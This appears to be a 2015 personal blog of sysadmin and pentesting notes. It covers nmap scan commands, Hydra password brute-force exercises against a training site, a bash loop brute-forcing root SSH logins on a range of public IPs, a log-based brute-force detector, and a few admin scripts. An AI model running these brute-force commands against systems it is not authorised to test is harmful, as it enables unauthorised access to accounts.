Wednesday, December 30, 2015

NMAP - Top Command Usage

- nmap 192.168.56.1
- nmap 192.168.56.1-255
- nmap 192.168.56.1 -p 80
- nmap 192.168.56.0/24 -p 1-1000
- nmap 192.168.56.0/24 --exclude 192.168.56.5
- nmap 192.168.56.0/24 --exclude 192.168.56.5,192.168.56.254
- nmap -F 192.168.56.1
- nmap -v -A 192.168.56.1 (detect the operating system and its version)
- nmap -sA 192.168.1.254 (ACK scan: check whether a firewall is in place at the target network/IP)
- nmap -Pn 192.168.1.1 (skip host discovery and scan anyway when a firewall is in place; -PN is the older spelling of this option)
- nmap --packet-trace 192.168.1.1 (show every packet sent and received)
- nmap -sV 192.168.56.1 (detect the services running on the target and their versions)

Tuesday, December 29, 2015

Hydra Bruteforce

##############################
# 0: Simple Test Case
##############################
hydra -l root -p password attack.samsclass.info http-get /basic0/
URL: http://attack.samsclass.info/basic0

################
# 1: 3-Digit PIN
################
The username is one of these: root, admin, administrator
------------
root@vnkkali:~/Documents# cat usernames1
root
admin
administrator
-------------
Create a file makepin3:
root@vnkkali:~/Documents# cat makepin3
-------------------
#!/bin/bash

# Write every 3-digit PIN (000-999) to the file pin3, one per line
for i in 0 1 2 3 4 5 6 7 8 9
do
  for j in 0 1 2 3 4 5 6 7 8 9
  do
    for k in 0 1 2 3 4 5 6 7 8 9
    do
      echo $i$j$k >> pin3
    done
  done
done
-------------------
Run this script to create a file named "pin3".

hydra -L usernames1 -P pin3 attack.samsclass.info http-get /basic1/
URL: http://attack.samsclass.info/basic1

######################
# 2: Top 50 Passwords
######################
The username is one of these: root, admin, administrator
Download the top 50 passwords, name the file top50.txt and attack:
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic2/
URL: http://attack.samsclass.info/basic2

#########################################
# 3: Top 50 Passwords + a digit (10 pts.)
#########################################
The username is one of these: root, admin, administrator
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic3/
URL: http://attack.samsclass.info/basic3

#############
# 4: Login Form
#############
The username is one of these: root, admin, administrator

hydra -L usernames1 -x 2:2:a attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pw=^PASS^:Deny"

Source: http://attack.samsclass.info/brute.htm 

#!/bin/bash
# Script Brute force SSH
for i in 124.124.124.{167..170}
do
  hydra "$i" ssh -l root -P top50.txt -s 22 -vV
done
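
For the defending side of the http-get runs above, this is an added example (not part of the original post) that counts 401 responses per source IP and path in a web server access log and reports any 200 that follows a burst of failures. The function names, the threshold of 10, the combined log format and the sample log lines are all assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag HTTP Basic auth guessing in a combined-format access log.
# Usage: detect_basic_bruteforce THRESHOLD < access.log
# Output per offender: ip path failed_401s distinct_users user_of_first_200_or_-
detect_basic_bruteforce() {
  awk -v min="$1" '
    {
      ip = $1; user = $3; path = $7; status = $9
      key = ip " " path
      if (status == 401) {
        fails[key]++
        # Count each attempted username once per source and path
        if (!((key, user) in seen)) { seen[key, user] = 1; users[key]++ }
      } else if (status == 200 && (key in fails) && fails[key] >= min && !(key in hit)) {
        hit[key] = user   # a 200 after many 401s: a guess probably succeeded
      }
    }
    END {
      for (key in fails)
        if (fails[key] >= min)
          printf("%s %d %d %s\n", key, fails[key], users[key], ((key in hit) ? hit[key] : "-"))
    }' | sort
}

# Constructed sample log (documentation IP ranges, made-up timestamps and sizes)
sample_log() {
  n=0
  for u in root admin administrator; do
    for s in 1 2 3 4; do
      n=$((n + 1))
      printf '203.0.113.7 - %s [29/Dec/2015:10:00:%02d +0000] "GET /basic1/ HTTP/1.1" 401 381 "-" "-"\n' "$u" "$n"
    done
  done
  printf '%s\n' \
    '203.0.113.7 - admin [29/Dec/2015:10:00:13 +0000] "GET /basic1/ HTTP/1.1" 200 512 "-" "-"' \
    '198.51.100.20 - alice [29/Dec/2015:10:01:00 +0000] "GET /basic1/ HTTP/1.1" 401 381 "-" "-"' \
    '198.51.100.20 - alice [29/Dec/2015:10:01:05 +0000] "GET /basic1/ HTTP/1.1" 200 512 "-" "-"'
}

sample_log | detect_basic_bruteforce 10
```

A user who mistypes a password once stays below the threshold and is not reported; the username column for a 401 is only what the client claimed, so treat it as a hint.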


Monday, December 28, 2015

NMAP - Commands

# One IP
nmap 192.168.56.1

# One Range
nmap 192.168.56.1-255

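# Ping scan: find the live hosts on a subnet (-sn, called -sP in older releases)
nmap -sn 192.168.56.0/24

# Gather detailed information about a host (SYN scan, no host discovery, OS and version detection)
nmap -sS -Pn -A 192.168.56.1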

# scan the information of the operating system and its version
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1

# check if a firewall is in place at the target network/IP
nmap -sA 192.168.1.254

# Detect different services running on the remote target
nmap -sV 192.168.56.1

# Specific port
nmap 192.168.56.1 -p 80

# Entire subnet with a specific port range
nmap 192.168.56.0/24 -p 1-1000

# Exclude host, hosts
nmap 192.168.56.0/24 --exclude 192.168.56.5
nmap 192.168.56.0/24 --exclude 192.168.56.5,192.168.56.254

# Speedy
nmap -F 192.168.56.1

Install Khmer Unicode In Kali 2.0

1. Download NIDA-X11-unicode-keyboard_1.0.2.tar.gz and Khmer Fonts

2. Extract
tar -xvf NIDA-X11-unicode-keyboard_1.0.2.tar.gz
3. Install
cd NIDA-X11-unicode-keyboard_1.0.2
./install
4. Install Fonts
Copy the font files to /usr/share/fonts/truetype/
and run this command:
fc-cache -f -v

5. Go to Settings and add the Khmer keyboard.

Switch keyboard (Super key + Space)

Sunday, December 27, 2015

Delete Mail Queue

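#!/bin/bash
# Search the deferred queue for a user, IP or content string and delete the matching mail
if [ -z "$1" ]
then
  echo "Usage: $0 IP or username"
  exit 1
fi
for i in 0 1 2 3 4 5 6 7 8 9 A B C D E F
do
  echo "Go to directory $i"
  # Skip this directory if cd fails, so grep never runs in the wrong place
  cd "/var/spool/postfix-deliver/deferred/$i" || continue
  # grep -l prints the names of the matching queue files (the queue IDs);
  # "--" keeps a search string that starts with "-" from being read as an option
  grep -l -- "$1" * | postsuper -c /etc/postfix-deliver/ -d -
done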

Tuesday, December 1, 2015

Script Get All IPs on Eth

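#!/bin/bash
# Collect the eth* interface names reported by "ip addr"
ETH=$(ip addr | grep eth | cut -d: -f2 | awk '{print $1}' | grep eth)

# Print the IPv4 addresses on each interface
# (grep -w inet skips inet6 lines, which the cut on ":" would mangle)
for i in $ETH; do
  echo "IP on $i: "
  ifconfig "$i" | grep -w inet | awk '{print $2}' | cut -d: -f2
done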